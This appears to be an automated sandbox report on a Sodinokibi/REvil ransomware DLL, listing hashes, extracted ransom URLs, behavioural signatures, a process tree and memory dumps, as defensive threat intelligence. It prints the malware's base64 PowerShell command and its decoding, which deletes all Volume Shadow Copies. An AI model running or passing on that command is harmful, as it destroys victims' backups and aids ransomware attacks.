Analysis
- max time kernel: 118s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240215-en
- resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
- submitted: 06-05-2024 00:30
Behavioral task behavioral1
- Sample: 19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll
- Resource: win7-20240215-en
Behavioral task behavioral2
- Sample: 19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll
- Resource: win10v2004-20240419-en
General
- Target: 19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll
- Size: 164KB
- MD5: 19e7e57a7622586a96b10cc489303d0e
- SHA1: 09e751d3f6078b21a534a319af248e03d82decdd
- SHA256: c25b0b627ea052c67ef549e1040e5a33779f8661172c2df6420de1d2b228f7b7
- SHA512: d059f5ba4cf37389a6d12701d7d37e4ec1815367a7c9822ff22a287ec3dcb99a669d8b48bea0948948d4235f86c0808ce8d0a01bbd9bc1914056c5e9874f7554
- SSDEEP: 3072:v0XoUeZ/DVS8L73ea4MoCLfqQvFfp/TIdPVBf:veoUeZR2TRCWQFfhTId
Malware Config
Extracted
- Path: C:\Users\34as0d2y-readme.txt
- Family: sodinokibi
- URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B52086FF733C4617
  http://decryptor.cc/B52086FF733C4617
Signatures
- Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Enumerates connected drives (3 TTPs, 25 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: rundll32.exe
  description: File opened (read-only); process: rundll32.exe; ioc (25 drive roots, every letter except C:):
  \??\P: \??\R: \??\W: \??\X: \??\I: \??\B: \??\E: \??\Y: \??\A: \??\J: \??\H: \??\O: \??\G: \??\T: \??\U: \??\D: \??\L: \??\F: \??\N: \??\K: \??\Q: \??\S: \??\V: \??\Z: \??\M:
- Drops file in Program Files directory (24 IoCs)
  Processes: rundll32.exe
  process: rundll32.exe for every row; description | ioc:
  File opened for modification | \??\c:\program files\WatchSelect.crw
  File created | \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\34as0d2y-readme.txt
  File opened for modification | \??\c:\program files\DenyUndo.m1v
  File opened for modification | \??\c:\program files\MergeConfirm.rm
  File opened for modification | \??\c:\program files\RestoreDisconnect.mpg
  File opened for modification | \??\c:\program files\UnblockSave.dwfx
  File created | \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\34as0d2y-readme.txt
  File created | \??\c:\program files\34as0d2y-readme.txt
  File opened for modification | \??\c:\program files\AddProtect.vsd
  File opened for modification | \??\c:\program files\EnableUnblock.jpg
  File opened for modification | \??\c:\program files\UseRegister.odt
  File opened for modification | \??\c:\program files\RestartClear.shtml
  File opened for modification | \??\c:\program files\SuspendExpand.7z
  File created | \??\c:\program files (x86)\microsoft sql server compact edition\34as0d2y-readme.txt
  File opened for modification | \??\c:\program files\AssertSearch.raw
  File opened for modification | \??\c:\program files\ConfirmWatch.scf
  File opened for modification | \??\c:\program files\MountConvert.php
  File opened for modification | \??\c:\program files\RenameFind.mpeg
  File opened for modification | \??\c:\program files\UnlockRepair.wmx
  File opened for modification | \??\c:\program files\UnlockSave.tiff
  File created | \??\c:\program files (x86)\34as0d2y-readme.txt
  File opened for modification | \??\c:\program files\JoinCompress.easmx
  File opened for modification | \??\c:\program files\RevokeDisable.wpl
  File opened for modification | \??\c:\program files\SetSwitch.3gpp
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: rundll32.exe, powershell.exe
  pid | process
  2232 | rundll32.exe
  2220 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: rundll32.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 2232 | rundll32.exe
  Token: SeDebugPrivilege | 2220 | powershell.exe
  Token: SeBackupPrivilege | 2456 | vssvc.exe
  Token: SeRestorePrivilege | 2456 | vssvc.exe
  Token: SeAuditPrivilege | 2456 | vssvc.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  Processes: rundll32.exe, rundll32.exe
  description | pid | process | target process
  PID 1568 wrote to memory of 2232 | 1568 | rundll32.exe | rundll32.exe
  PID 1568 wrote to memory of 2232 | 1568 | rundll32.exe | rundll32.exe
  PID 1568 wrote to memory of 2232 | 1568 | rundll32.exe | rundll32.exe
  PID 1568 wrote to memory of 2232 | 1568 | rundll32.exe | rundll32.exe
  PID 1568 wrote to memory of 2232 | 1568 | rundll32.exe | rundll32.exe
  PID 1568 wrote to memory of 2232 | 1568 | rundll32.exe | rundll32.exe
  PID 1568 wrote to memory of 2232 | 1568 | rundll32.exe | rundll32.exe
  PID 2232 wrote to memory of 2220 | 2232 | rundll32.exe | powershell.exe
  PID 2232 wrote to memory of 2220 | 2232 | rundll32.exe | powershell.exe
  PID 2232 wrote to memory of 2220 | 2232 | rundll32.exe | powershell.exe
  PID 2232 wrote to memory of 2220 | 2232 | rundll32.exe | powershell.exe
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll,#1
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which is what triggers the vssvc.exe activity and the Volume Shadow Copy signature above)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe
  C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\34as0d2y-readme.txt
  Filesize: 6KB
  MD5: 79ef12f508f4e396a4174248c69fe196
  SHA1: 3fa90e82de1ae332059fae6ce4e1df2e4813d01c
  SHA256: 1696a68117401365320c554f5ea27268762046f6afca2a47d01aefa4747adc3e
  SHA512: b9cd3579534cb8408cc920f8045ad0888ed8d8336843003e65e33ff71bad2ed4f13952aab453cbf3e949fd032b152d1975087818c389fb885654bbbc9146ed66
- memory/2220-4-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp (Filesize: 4KB)
- memory/2220-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp (Filesize: 2.9MB)
- memory/2220-7-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp (Filesize: 9.6MB)
- memory/2220-6-0x0000000002340000-0x0000000002348000-memory.dmp (Filesize: 32KB)
- memory/2220-8-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp (Filesize: 9.6MB)
- memory/2220-9-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp (Filesize: 9.6MB)
- memory/2220-10-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp (Filesize: 9.6MB)
- memory/2220-11-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp (Filesize: 9.6MB)
- memory/2220-12-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp (Filesize: 9.6MB)